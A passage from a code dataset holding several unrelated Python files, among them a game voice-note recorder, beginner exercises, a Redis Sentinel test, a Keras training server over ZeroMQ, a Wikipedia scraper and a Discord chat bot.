as e: google = repr(e)\n\n\tprint(\"Google:\", google, file=log, flush=True)\n\n\t# Below duplicated into gamestate_integration.py\n\ttry:\n\t\twith open(block + \"/metadata.json\") as f: meta = json.load(f)\n\texcept (FileNotFoundError, json.decoder.JSONDecodeError): meta = {}\n\tif \"recordings\" not in meta: meta[\"recordings\"] = []\n\tnote_id = meta[\"recordings\"][-1][\"id\"] + 1 if meta[\"recordings\"] else 1\n\tfn = f\"/{note_id:02d} - {desc.replace('/', '_')}.flac\"\n\twith open(block + fn, \"wb\") as f: f.write(audio.get_flac_data())\n\tmeta[\"recordings\"].append({\n\t\t\"id\": note_id,\n\t\t\"desc\": desc,\n\t\t\"filename\": fn,\n\t\t\"sphinx\": options[:5],\n\t\t\"google\": google,\n\t})\n\tfor key in \"round\", \"spec\", \"score\", \"time\", \"bombtime\", \"player_state\":\n\t\tif key in extra: meta[\"recordings\"][-1][key] = extra[key]\n\twith open(block + \"/metadata.json\", \"w\") as f:\n\t\tjson.dump(meta, f, sort_keys=True, indent=2)\n\n\tif \"--gsi\" in sys.argv:\n\t\t# Signal the GSI server to load new metadata, if appropriate\n\t\trequests.post(\"http://localhost:27013/metadata/\" + blocks[-1], json=meta)\n\ndef watchdog(status):\n\t\"\"\"Wait until it's been 5-10 mins since the last action, and GSI says we're inactive\"\"\"\n\twhile True:\n\t\ttime.sleep(300)\n\t\tgsi_data = requests.get(\"http://localhost:27013/status.json?silent=true\").json()\n\t\tprint(\"Watchdog check:\", gsi_data[\"playing\"])\n\t\tif gsi_data[\"playing\"]: continue\n\t\tif not status[0]: break\n\t\tstatus[0] = False\n\tprint(\"Watchdog close\")\n\tsocket.socket(socket.AF_UNIX, socket.SOCK_DGRAM).sendto(b\"!\", TRIGGER_SOCKET)\n\nif \"--gsi\" in sys.argv:\n\t# Try to connect to the trigger socket. If it fails, start the server.\n\t# Note that this can get into a race situation. I don't know how to\n\t# perfectly solve this, so we just retry a few times.\n\tfor _ in range(4):\n\t\tclient = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)\n\t\ttry: client.sendto(b\"*\", TRIGGER_SOCKET)\n\t\texcept FileNotFoundError: pass # Socket doesn't exist\n\t\texcept ConnectionRefusedError: os.unlink(TRIGGER_SOCKET) # Socket exists in the file system but isn't listened on\n\t\telse: print(\"Triggered server\"); break # Done! The server's been triggered.\n\n\t\tserver = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)\n\t\ttry:\n\t\t\tserver.bind(TRIGGER_SOCKET)\n\t\t\tprint(\"Listening\")\n\t\t\tstatus = [True]\n\t\t\tthreading.Thread(target=watchdog, args=(status,), daemon=True).start()\n\t\t\twhile True:\n\t\t\t\t# Do one note-taking now, and then wait for the socket\n\t\t\t\tgsi_data = requests.get(\"http://localhost:27013/status.json\").json()\n\t\t\t\tif gsi_data[\"playing\"]:\n\t\t\t\t\t# In case of issues, spawn separate threads to take the notes\n\t\t\t\t\tthreading.Thread(target=take_notes, kwargs=gsi_data).start()\n\t\t\t\t# Wait for the next trigger (or the watchdog shutdown signal)\n\t\t\t\tdata, _ = server.recvfrom(1024)\n\t\t\t\tif data == b\"!\": break # Signal from the other thread (or another process) to shut down\n\t\t\t\tstatus[0] = True\n\t\t\t\tprint(\"Got trigger\")\n\t\t\tbreak\n\t\texcept OSError as e:\n\t\t\tif e.errno == 98: continue # Address already in use - try reconnecting\n\t\t\telse: raise\n\t\tfinally:\n\t\t\tserver.close()\n\t\t\ttry: os.unlink(TRIGGER_SOCKET)\n\t\t\texcept FileNotFoundError: pass\nelse:\n\tdesc = \" \".join(arg for arg in sys.argv[1:] if not arg.startswith(\"-\"))\n\ttake_notes(desc=desc, new_match=\"--new-block\" in sys.argv)\n","sub_path":"notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":6887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"177244923","text":"gols = []\ntime = []\ntotG = 0\ncod = 0\nwhile True:\n jogador = {'cod': cod}\n cod += 1\n jogador['nome'] = str(input('Nome do jogador: '))\n totP = int(input(f'Quantas partidas {jogador[\"nome\"]} jogou? '))\n for c in range(0, totP):\n quantG = int(input(f'Quantos gols na partida {c+1}? '))\n gols.append(quantG)\n totG += quantG\n jogador['gols'] = gols.copy()\n jogador['total'] = totG\n time.append(jogador.copy())\n jogador.clear()\n gols.clear()\n totG = 0\n resp = input('Deseja Continuar? [S/N] ').upper()\n if resp in 'N':\n break\n print('-' * 10)\n\nprint('=-'*50)\nprint('{:<5}{:<10}{:<15}{:<5}'.format('COD', ' NOME', ' GOLS', ' TOTAL'))\nprint('-'*40)\nfor j in time:\n s = str(j['gols'])\n print('{:<5} {:<10} {:<15} {:<5}'.format(j['cod'], j['nome'], s, j['total']))\n\nprint('=-'*40)\nresp = int(input('Mostrar dados de qual jogador? [digite o id do jogador] [999 interrompe] '))\nwhile True:\n if resp == 999:\n break\n if resp >= len(time):\n print('Jogador inexistente!')\n resp = int(input('Mostrar dados de qual jogador? [digite o id do jogador] [999 interrompe] '))\n else:\n print('levantamento do jogador {}'.format(time[resp]['nome']))\n for i, g in enumerate(time[resp]['gols']):\n print(f'na partida {i+1} fez {g} gols')\n print('=-' * 40)\n resp = int(input('Mostrar dados de qual jogador? [digite o id do jogador] [999 interrompe] '))\n","sub_path":"CursoemVideo/desafio95aula19f.py","file_name":"desafio95aula19f.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"34572494","text":"def main():\n\tinstancias = int(input())\n\twhile instancias:\n\t\tnumConj = int(input())\n\t\tsetslist = []\n\n\t\tfor i in range(numConj):\n\t\t\tauxlist = []\n\t\t\tline = input()\n\t\t\tline = line.split(\" \")\n\t\t\t\n\t\t\tfor c in line:\n\t\t\t\tauxlist.append(int(c))\n\t\t\tdel auxlist[0]\n\n\t\t\tauxset = set(auxlist)\n\t\t\tsetslist.append(auxset)\n\n\t\tnumOps = int(input())\n\t\tans = []\n\t\tfor i in range(numOps):\n\t\t\tline = input()\n\t\t\tline = line.split(\" \")\n\t\t\ta = int(line[1]) - 1\n\t\t\tb = int(line[2]) - 1\n\t\t\tcount = 0\n\n\t\t\tif int(line[0]) == 1:\n\t\t\t\t#intersecao\n\t\t\t\tcount = len( set.intersection( setslist[a], setslist[b] ) )\n\t\t\t\tprint( count)\n\t\t\t\tans.append(count)\n\t\t\telse:\n\t\t\t\t# uniao \n\t\t\t\tcount = len( set.union( setslist[a], setslist[b] ))\n\t\t\t\tprint(count)\n\t\t\t\tans.append(count)\n\n\t\tinstancias -= 1\n\n\nmain()","sub_path":"minitest1/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"399973652","text":"import unittest\n\nimport mock\nimport redis.sentinel\n\nfrom limits.storage import RedisSentinelStorage, storage_from_string\nfrom tests.storage.test_redis import SharedRedisTests\n\n\nclass RedisSentinelStorageTests(SharedRedisTests, unittest.TestCase):\n def setUp(self):\n self.storage_url = 'redis+sentinel://localhost:26379'\n self.service_name = 'localhost-redis-sentinel'\n self.storage = RedisSentinelStorage(\n self.storage_url,\n service_name=self.service_name\n )\n redis.sentinel.Sentinel([\n (\"localhost\", 26379)\n ]).master_for(self.service_name).flushall()\n\n def test_init_options(self):\n with mock.patch(\n \"limits.storage.redis_sentinel.get_dependency\"\n ) as get_dependency:\n storage_from_string(\n self.storage_url + '/' + self.service_name,\n connection_timeout=1\n )\n self.assertEqual(\n get_dependency().Sentinel.call_args[1]['connection_timeout'], 1\n )","sub_path":"tests/storage/test_redis_sentinel.py","file_name":"test_redis_sentinel.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"111406331","text":"#\n# Server in Python\n# Binds REP socket to tcp://*:3001\n# Expects input from client to reply with something\n#\n\nimport time\nimport zmq\nimport numpy as np\nimport pandas as pd\nimport math\nimport os\nimport sys\nimport json\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n# Keras stuff\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras import optimizers\nfrom keras import callbacks\nimport keras.backend as K\n\n# Sklearn stuff\nfrom sklearn.metrics import r2_score\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\n\n\ndef processParams(params):\n\tallParams = params.split(\"&\")\n\t\n\tloss = ''\n\toptimizer = ''\n\tlearningRate = 0\n\tepochs = 0\n\tbatchSize = 0\n\ttestSize = 0\n\tlayers = []\n\t\n\tfor param in allParams:\n\t\tif \"loss\" in param:\n\t\t\tloss = param.split(\"=\")[1]\n\t\telif \"optimizer\" in param:\n\t\t\toptimizer = param.split(\"=\")[1]\n\t\telif \"learningRate\" in param:\n\t\t\tlearningRate = param.split(\"=\")[1]\n\t\telif \"epochs\" in param:\n\t\t\tepochs = param.split(\"=\")[1]\n\t\telif \"batchSize\" in param:\n\t\t\tbatchSize = param.split(\"=\")[1]\n\t\telif \"testSize\" in param:\n\t\t\ttestSize = param.split(\"=\")[1]\n\t\telif \"layers\" in param:\n\t\t\ttmp = param[param.index('=')+1:]\n\t\t\ttmp = tmp.replace('[', '')\n\t\t\ttmp = tmp.replace(']', '')\n\n\t\t\ttmpLayers = tmp.split(';')\n\n\t\t\tfor tmpLayer in tmpLayers:\n\t\t\t\ttmpValues = tmpLayer.split(',')\n\t\t\t\t\n\t\t\t\ttoAdd = []\n\t\t\t\tfor tmpValue in tmpValues:\n\t\t\t\t\ttoAdd.append(tmpValue.split(\"=\")[1])\n\n\t\t\t\tlayers.append(toAdd)\n\t\n\treturn {'loss':loss, 'optimizer':optimizer, 'learningRate':learningRate, 'epochs':epochs, 'batchSize':batchSize, 'testSize':testSize, 'layers':layers}\n\ndef buildModel(params, inputShape, outputShape):\n\t# Adjusting format of inputShape\n\tinputShape = (inputShape,)\n\tmodel = Sequential()\n\t\n\tfor layer in params['layers']:\n\t\tneurons = int(layer[1])\n\t\tactivationFunc = layer[2]\n\t\t\n\t\tif layer[0] == 1:\n\t\t\tmodel.add(Dense(neurons, input_shape=inputShape, activation=activationFunc, kernel_initializer='lecun_uniform'))\n\t\telse:\n\t\t\tmodel.add(Dense(neurons, activation=activationFunc, kernel_initializer='lecun_uniform'))\n\t\n\tmodel.add(Dense(outputShape, kernel_initializer='lecun_uniform'))\n\tmodel.compile(optimizer=getOptimizer(params), loss=params['loss'])\n\n\treturn model\n\ndef getOptimizer(params):\n\topt = None\n\toptName = params['optimizer'].lower()\n\tlearningRate = float(params['learningRate'])\n\t\n\tif optName == 'sgd':\n\t\topt = optimizers.SGD(lr=learningRate)\n\telif optName == 'rmsprop':\n\t\topt = optimizers.RMSprop(lr=learningRate)\n\telif optName == 'adagrad':\n\t\topt = optimizers.Adagrad(lr=learningRate)\n\telif optName == 'adadelta':\n\t\topt = optimizers.Adadelta(lr=learningRate)\n\telif optName == 'adam':\n\t\topt = optimizers.Adam(lr=learningRate)\n\telif optName == 'adamax':\n\t\topt = optimizers.Adamax(lr=learningRate)\n\telif optName == 'nadam':\n\t\topt = optimizers.Nadam(lr=learningRate)\n\t\t\n\treturn opt\n\ndef organizeData(testSize, sc, sc2):\n\t\n\t# Get the dataset and prepare it for analysis and model\n\tdf = pd.read_csv('suncor_full.csv')\n\tdataset=df.values[:,:]\n\tfeatures=dataset.shape[1]\n\t# Create training and testing data\n\tX = df.iloc[:, 1:features-1].values\n\ty = df.iloc[:, features-1].values\n\n\tsplit=int(X.shape[0]*(1-testSize))\n\tprint(split)\n\n\tX_train=X[:split,:]\n\tX_test=X[split:,:]\n\ty_train=y[:split]\n\ty_test=y[split:]\n\n\t#X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=testSize, random_state=0)\n\n\t# Normalize the dataset with sc and sc2 (MinMaxScalers)\n\n\tX_train = sc.fit_transform(X_train)\n\tX_test = sc.transform(X_test)\n\n\ty_train = np.reshape(y_train, (y_train.shape[0], 1))\n\ty_test = np.reshape(y_test, (y_test.shape[0], 1))\n\n\ty_train = sc2.fit_transform(y_train)\n\ty_test = sc2.transform(y_test)\n\n\t#print('Train size: (%d x %d)'%(X_train.shape[0], X_train.shape[1]))\n\t#print('Test size: (%d x %d)'%(X_test.shape[0], X_test.shape[1]))\n\t\n\treturn X_train, X_test, y_train, y_test\n\ndef trainModel(params):\n\t# Organize data\n\ttestSize = float(params['testSize'])\n\t\n\t# Normalize the dataset\n\tsc = MinMaxScaler()\n\tsc2 = MinMaxScaler()\n\t#sc2 = StandardScaler()\n\t\n\tX_train, X_test, y_train, y_test = organizeData(testSize, sc, sc2)\n\t\n\t\"\"\"\n\t# Using clear_session() may result unexpected behaviors.\n\t# For instance, after building and training the 6th model the program would just crash without throwing an exception.\n\tK.clear_session()\n\t\"\"\"\n\t\n\t# Build model\n\tmodel = buildModel(params, X_train.shape[1], y_train.shape[1])\n\t\n\t# Train model\n\t# Fitting the ANN to the training set\n\tbatchSize = int(params['batchSize'])\n\tepochsNum = int(params['epochs'])\n\t\n\tmodel.fit(X_train, y_train, batch_size=batchSize, epochs=epochsNum, verbose=0)\n\t\n\t\"\"\"\n\t#keras.callbacks.LambdaCallback(on_epoch_begin=None, on_epoch_end=None, on_batch_begin=None, on_batch_end=None, on_train_begin=None, on_train_end=None)\n\t#https://keras.io/callbacks/\n\tclass Callback(callbacks.Callback):\n\t\tdef on_epoch_end(self, batch, logs={}):\n\t\t\tprint('There you go!')\n\t\t\t#self.stopped_epoch = epoch\n\t\t\t#self.model.stop_training = True\n\n\t# Defining a callback\n\tcallbackTest = Callback()\n\tmodel.fit(X_train, y_train, batch_size=batchSize, epochs=epochsNum, verbose=1, callbacks=[callbackTest])\n\t\"\"\"\n\t\n\t# Test model\n\ty_pred = model.predict(X_test)\n\n\ty_pred = sc2.inverse_transform(y_pred)\n\ty_test = sc2.inverse_transform(y_test)\n\n\t# Scalar test loss\n\t#score = model.evaluate(X_test, y_test, verbose=1)\n\t#print(score)\n\n\t#https://en.wikipedia.org/wiki/Coefficient_of_determination\n\trSquared = r2_score(y_test, y_pred)\n\trmse = math.sqrt(mean_squared_error(y_test, y_pred))\n\tprint('R-Squared: %f' % rSquared)\n\tprint('RMSE: %f' % rmse)\n\t\n\t# Converting from numpy arrays to list to allow json creation\n\treturn {'values':y_test.tolist(), 'predicted':y_pred.tolist(), 'r-squared':rSquared, 'rmse':rmse}\n\t\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.bind(\"tcp://*:3001\")\n\nprint(\"Server awaiting for requests on port 3001.\")\n\nwhile True:\n\ttry:\n\t\t# Wait for next request from client\n\t\tmessage = socket.recv()\n\t\t\n\t\tprint('> Received request. <')\n\t\t\n\t\tprocParams = processParams(message.decode('utf-8'))\n\t\tresults = trainModel(procParams)\n\t\t\n\t\t# Converting dictionary to json\n\t\tjsonResults = json.dumps(results)\n\t\t\n\t\t# Send reply back to client\n\t\tsocket.send_string(jsonResults)\n\t\t#socket.send(b\"Done\")\n\t\tprint('> Response sent! <')\n\texcept Exception as e:\n\t\t#e = sys.exc_info()[0]\n\t\tprint(e)\n\t\tsocket.send_string('Error!')\n\t\t\n\"\"\"\nmultiprocessing\n\nfrom multiprocessing import Process, Queue\n\ndef run_in_separate_process(method, args):\n def queue_wrapper(q, params):\n r = method(*params)\n q.put(r)\n\n q = Queue()\n p = Process(target=queue_wrapper, args=(q, args))\n p.start()\n return_val = q.get()\n p.join()\n return return_val\n\n\"\"\"\n","sub_path":"script/tensorflow serv.py","file_name":"tensorflow serv.py","file_ext":"py","file_size_in_byte":6782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"630504835","text":"import k2uu as K2U\n\nclass SUnit (object):\n \n def __init__(self, tasksets, tests):\n self.tasksets = tasksets\n self.tests = tests\n self.threadpool = 0\n\n for test in self.tests:\n if not isinstance(Test, test):\n raise ValueError (\"provided Test does not implement the Scheduling Test interface\")\n else:\n test.start ()\n\n\n def test (self, modifier = None): \n \n if modifier == \"utilisation-bound\":\n tasksets = generator.tasksets (100, 10, generator.implicit).compile ([\"uniform\", [0.1, 0.9], True],[\"unifast\", []])\n\n for test in self.tests: \n test.start ()\n test.join ()\n","sub_path":"model/k2u/bench.py","file_name":"bench.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"216934209","text":"import builtins\nfrom .Constants import *\nfrom tkinter import *\nfrom util.Costumes import *\n\ndef CloseCostumes():\n winCost.destroy()\n del builtins.winCost\n \n#Create Window Costumes\ndef CreateWindowCostumes():\n global save\n if save.data==None:\n labelMessage.config(fg='red', text='No save data.')\n return\n try:\n builtins.winCost\n except:\n builtins.winCost = Toplevel()\n winCost.protocol(\"WM_DELETE_WINDOW\", CloseCostumes)\n winCost.geometry(\"550x600\")\n winCost.resizable(width=True, height=True)\n winCost.title(\"Ham-Ham Games Save Editor - Costumes\")\n builtins.lstCostumes = []\n\n frameButtonCost = Frame(winCost)\n frameButtonCost.pack(side=BOTTOM, fill=X)\n builtins.buttonChkAllCost = Button(frameButtonCost, text=\"Select All\", command=SelectAllCostumes, font=FONT)\n buttonChkAllCost.pack(side=LEFT, fill=BOTH, expand=1)\n builtins.buttonUnchkAllCost = Button(frameButtonCost, text=\"Deselect All\", command=DeselectAllCostumes, font=FONT)\n buttonUnchkAllCost.pack(side=LEFT, fill=BOTH, expand=1)\n builtins.buttonSaveCost = Button(frameButtonCost, text=\"Save Costumes\", command=SaveWindowCostumes, font=FONT)\n buttonSaveCost.pack(side=RIGHT, fill=BOTH, expand=1)\n \n frameCost = Frame(winCost)\n frameCost.pack(side=TOP, fill=BOTH, expand = 1)\n for i in range(4):\n frameCost.columnconfigure(i, weight=1)\n for i in range(NB_COST//4+1):\n frameCost.rowconfigure(i, weight=1)\n \n for i in range(NB_COST):\n b = BooleanVar()\n chk = Checkbutton(frameCost, text=(\"%02d - \"%(i+1))+costumes[i][1], font=FONT, bd=0, variable=b)\n chk.grid(row=i//4, column=i%4, sticky=\"w\")\n if HasCostume(save.data, i):\n chk.select()\n lstCostumes.append((chk, b))\n\ndef SelectAllCostumes():\n for i in range(NB_COST):\n lstCostumes[i][0].select()\n \ndef DeselectAllCostumes():\n for i in range(NB_COST):\n lstCostumes[i][0].deselect()\n \ndef SaveWindowCostumes():\n global save\n for i in range(NB_COST):\n if lstCostumes[i][1].get():\n save.data = GetCostume(save.data, i)\n else:\n save.data = DelCostume(save.data, i)\n","sub_path":"edit/Costumes.py","file_name":"Costumes.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"81936965","text":"#!/usr/bin/env python3\n\nfrom bs4 import BeautifulSoup\nfrom requests import get\nfrom bs4.element import Tag\n\n\nignore = {'Lisp Machines, Inc.', 'Symbolics', 'Texas Instruments', 'Xerox'}\n\nlevels = {}\nlevels['Apple Inc.'] = {3}\nlevels['On S/360, S/370, and successor mainframes'] = {3}\nlevels['On other hardware platforms'] = {3}\n\n\ndef before(tag1, tag2, startTag):\n\n if len(tag1) == 0: return False;\n if len(tag2) == 0 :return True;\n\n tempTag = startTag\n\n while tempTag and tempTag.previous_sibling:\n tempTag = tempTag.previous_sibling\n if isinstance(tempTag, Tag):\n if tag1 in tempTag.getText():\n return True\n elif tag2 in tempTag.getText():\n return False\n\n return True\n\n\ndef includeLI(tag):\n\n for p in tag.parents:\n\n # ignores tags in the page's table of contents, navigation header, and footer\n if 'id' in p.attrs.keys() and ('toc' in p['id'] or 'mw-navigation' in p['id'] or 'footer' in p['id']):\n return False;\n\n # ignores links to external references and wikipedia categories\n if 'class' in p.attrs.keys() and ('references' in p['class'] or 'reference' in p['class'] or 'catlinks' in p['class']):\n return False;\n\n # ignores navigation links \n if 'role' in p.attrs.keys() and 'navigation' in p['role']:\n return False;\n\n # ignores the 'See also' links\n if tag.parent and tag.parent.find_previous_sibling('h2') and 'See also' in tag.parent.find_previous_sibling('h2').text:\n return False;\n\n # ignores the external links\n if tag.parent and tag.parent.find_previous_sibling('h2') and 'External links' in tag.parent.find_previous_sibling('h2').text:\n return False;\n\n return True;\n\n\ndef includeA(tag):\n\n # ignores tags specified directly in the ignore list\n if tag.text in ignore:\n return False;\n\n # ignores links to external references and wikipedia categories\n p = tag.parent\n if p and 'class' in p.attrs.keys() and 'reference' in p['class']:\n return False;\n\n # this page displays operating systems at various levels of specificity,from kernel down to \n # particular distributions in some cases. the script allows the user to specify the correct \n # level(s) of each list to pull using the 'levels' dictionary defined abouve. the code below\n # insures that the tag is at an acceptable level. if the level is not specified, top-level\n # items are pulled.\n\n h4Depth = -1 # -1 because it takes one move to get out of the tag itself \n h4Heading = ''\n temp = tag\n while temp and not temp.find_previous_sibling('h4'):\n h4Depth += 1\n temp = temp.parent\n\n if temp and temp.find_previous_sibling('h4') and temp.find_previous_sibling('h4').select('span'):\n h4Heading = temp.find_previous_sibling('h4').select('span')[0].getText()\n\n h3Depth = -1 \n h3Heading = '' \n temp = tag\n while temp and not temp.find_previous_sibling('h3'):\n h3Depth += 1\n temp = temp.parent\n\n if temp and temp.find_previous_sibling('h3') and temp.find_previous_sibling('h3').select('span'):\n h3Heading = temp.find_previous_sibling('h3').select('span')[0].getText()\n\n if h4Depth < h3Depth or before(h4Heading, h3Heading, temp) and h4Heading in levels:\n return h4Depth in levels[h4Heading]\n\n elif h3Heading in levels:\n return h3Depth in levels[h3Heading];\n\n else:\n return h3Depth == 1\n\n\nbaseUrl = 'https://en.wikipedia.org/wiki/List_of_operating_systems'\n\ndoc = get(baseUrl).text\nsoup = BeautifulSoup(doc, 'html.parser')\nlistItems = soup.select('li')\n\nanswers = set()\n\nfor i in listItems:\n\n if not includeLI(i): continue\n\n links = i.select('a')\n\n if links and includeA(links[0]) and not links[0].getText() in answers:\n answers.add(links[0].getText())\n\nfor answer in sorted(answers):\n print(answer)\n\n","sub_path":"bin/kernels.py","file_name":"kernels.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"162537173","text":"\"\"\"\nSplitting genomic DNA\nIn materials folder, there is a file called genomic_dna.txt\n Write a program that will split the genomic DNA into coding and non-coding parts, and write these sequences to two separate files\n\"\"\"\ndna=\"ATCGATCGATCGATCGACTGACTAGTCATAGCTATGCATGTAGCTACTCGATCGATCGA TCGATCGATCGATCGATCGATCGATCATGCTATCATCGATCGATATCGATGCATCGACT ACTAT\"\nexon1=dna[:63]\nexon2=dna[91:]\nintron=dna[63:91]\ndna_coding_per=(len(exon1)+len(exon2))/((len(exon1)+len(exon2))+len(intron))\ndna_coding=exon1+exon2\ndna_noncoding=intron\nmy_file=open(\"out_genomic_dna.txt\",\"w\")\nmy_file.write(dna_coding)\nmy_file.write(\"\\n\")\nmy_file.write(dna_noncoding)\nmy_file.close()\n","sub_path":"genomic_dna.py","file_name":"genomic_dna.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"115888550","text":"import random, config\r\nfrom modules import eightball\r\nbot = config.bot\r\nday = ['its been alright','pretty good','fantastic','pretty shit','meh','kill me pl0x','lovely just like you uWu']\r\nlove =['ewww','uWu I wuv u too','Silly human as if I could love a lower simple minded life form dont make me laugh']\r\neightball = ['uh nah', 'sure whatev', 'idklol', 'hell yea', 'no fuck that',];\r\n@bot.listen()\r\nasync def on_message(message):#text interactions based on user input but not using command prefix \r\n if message.author == bot.user:\r\n return\r\n if message.content.startswith('redbot, ') or message.content.startswith('redbot ') and (' or ') in message.content.lower():#a or b? \r\n print('%s requesting %s' % (message.author.name, 'yes or no'))\r\n decisions = message.content.lower().replace('redbot', ''); decisions = decisions.replace(',', ''); decisions = decisions.split(' or ')\r\n choice = random.choice(decisions)\r\n await bot.send_message(message.channel, '%s, %s' % (message.author.name, random.choice(decisions)))\r\n return\r\n if message.content.startswith('!8ball'):\r\n await bot.send_message(message.channel, random.choice(eightball))\r\n print('%s requesting %s' % (message_author.name, '8ball'))\r\n return\r\n if any(x in message.content.lower() for x in ('how has','how was')) and ('your', 'ur') and 'redbot' in message.content.lower():\r\n await bot.send_message(message.channel, random.choice(day)+' how has yours been? {0.author.mention}'.format(message))\r\n print('%s requesting %s' % (message.author.name, 'day'))\r\n response = await bot.wait_for_message(author=message.author, timeout=60)\r\n if response.content.startswith('great'):\r\n await bot.send_message(message.channel, 'gland to hear it <3')\r\n return\r\n if response.content.startswith('bad'):\r\n await bot.send_message(message.channel, 'sorry to hear that (´・ω・`)')\r\n return\r\n \r\n if any(x in message.content.lower() for x in (' love ', ' wuv')) and 'redbot' in message.content.lower():\r\n if message.author.id == ('453783112070201346'):\r\n await bot.send_message(message.channel, 'sorry I only like 2d grills uWu')\r\n return\r\n await bot.send_message(message.channel, random.choice(love))\r\n print('%s requesting %s' % (message.author.name, 'love'))\r\n return\r\n if any(x in message.content.lower() for x in ('hello', 'hi')) and 'redbot' in message.content.lower():\r\n if message.author.id == ('113421096488878080'):\r\n msg = 'Hello Master'.format(message)\r\n await bot.send_message(message.channel, msg)\r\n return\r\n else:\r\n msg = 'Hello {0.author.mention}'.format(message)\r\n await bot.send_message(message.channel, msg)\r\n return\r\n if any(x in message.content.lower() for x in ('fuck', 'fk', 'fuk')) and ('you', 'u') and 'redbot' in message.content.lower():\r\n print('%s requesting %s' % (message.author.name, 'flip the bird'))\r\n await bot.send_message(message.channel, ' No U https://tenor.com/view/fake-flip-off-middle-finger-bye-wave-gif-5337173')\r\n return\r\n if any(x in message.content.lower() for x in ('fuck', 'fk', 'fuk')) and ('you', 'u') and 'redbot' in message.content.lower():\r\n print('%s requesting %s' % (message.author.name, 'flip the bird'))\r\n await bot.send_message(message.channel, ' No U https://tenor.com/view/fake-flip-off-middle-finger-bye-wave-gif-5337173')\r\n return\r\n if any(x in message.content.lower() for x in ('night', 'goodnight')) and 'redbot' in message.content.lower():\r\n print('%s requesting %s' % (message.author.name, 'goodnight'))\r\n await bot.send_message(message.channel, 'Goodnight %s (*^▽^)/' % message.author.name)\r\n elif any(x in message.content.lower() for x in ('morning', 'good morning')) and 'redbot' in message.content.lower():\r\n print('%s requesting %s' % (message.author.name, 'morning redbot'))\r\n await bot.send_message(message.channel, 'Good morning %s ( ^ω^)' % message.author.name)\r\n elif any(x in message.content.lower() for x in ('pls', 'plis', 'please')) and 'redbot' in message.content.lower():\r\n print('%s requesting %s' % (message.author.name, 'nope'))\r\n await bot.send_message(message.channel, 'nope')\r\n \r\n","sub_path":"modules/On_message.py","file_name":"On_message.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"406872005","text":"# -*- coding: utf8 -*-\nfrom __future__ import print_function\n\nimport sys\nimport os\nimport re\nimport ast\nimport string\nimport random\nimport logging\nimport platform\nimport functools\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\ntry:\n # The fast Python 2.7.x module\n import cStringIO as StringIO\nexcept:\n try:\n # Python 2.x fallback\n from StringIO import StringIO\n except ImportError:\n # Python 3.x\n from io import StringIO\n\nfrom ..foundations.classes import SimpleObject\n\nfrom . import nofabric\n# Cannot import \"utils\" here, circular loop.\n\ntry:\n from fabric.api import env, execute, task\n from fabric.api import run as fabric_run\n from fabric.api import sudo as fabric_sudo\n from fabric.api import local as fabric_local\n from fabric.operations import get, put\n from fabric.context_managers import prefix, cd, lcd, hide\n from fabric.colors import cyan\n\n # imported from utils\n from fabric.contrib.files import exists # NOQA\n\n # used in sparks submodules, not directly here. Thus the # NOQA.\n from fabric.api import task # NOQA\n from fabric.context_managers import cd # NOQA\n from fabric.colors import green # NOQA\n\n # if not env.all_hosts:\n # env.host_string = 'localhost'\n\n _wrap_fabric = False\n\n #\n # NOTE: we re-wrap fabric functions into ours, which test against localhost.\n # This allows multiprocessing to run correctly on localhost, via real\n # local commands.\n # Else, paramiko will fail with obscure errors (observed in the `pkgmgr`),\n # and it's horribly terrible to debug (trust me).\n # Hoping nobody will try to multiprocessing.Process(fabric) via sparks\n # (or not). This only seems to work when fabric does the @parallel jobs,\n # not when trying to run fabric tasks in multiprocessing.* encapsulation.\n #\n\n def run(*args, **kwargs):\n if is_localhost(env.host_string):\n return nofabric.run(*args, **kwargs)\n\n else:\n return fabric_run(*args, **kwargs)\n\n def local(*args, **kwargs):\n if is_localhost(env.host_string):\n return nofabric.local(*args, **kwargs)\n\n else:\n return fabric_local(*args, **kwargs)\n\n def sudo(*args, **kwargs):\n if is_localhost(env.host_string):\n return nofabric.sudo(*args, **kwargs)\n\n else:\n return fabric_sudo(*args, **kwargs)\n\nexcept ImportError:\n # If fabric is not available, this means we are imported from 1nstall.py,\n # or more generaly fabric is not installed.\n # Everything will fail except the base system detection. We define the bare\n # minimum for it to work on a local Linux/OSX system.\n\n run = nofabric.run # NOQA\n local = nofabric.local # NOQA\n sudo = nofabric.sudo # NOQA\n exists = nofabric.exists # NOQA\n\n\n# Global way to turn all of this module silent.\nDEBUG = bool(os.environ.get('SPARKS_DEBUG', False))\nQUIET = not DEBUG and not bool(os.environ.get('SPARKS_VERBOSE', True))\nLOGGER = logging.getLogger(__name__)\nremote_configuration = None\nlocal_configuration = None\n\nall_roles = [\n 'web', 'proxy',\n 'db', 'memcache', 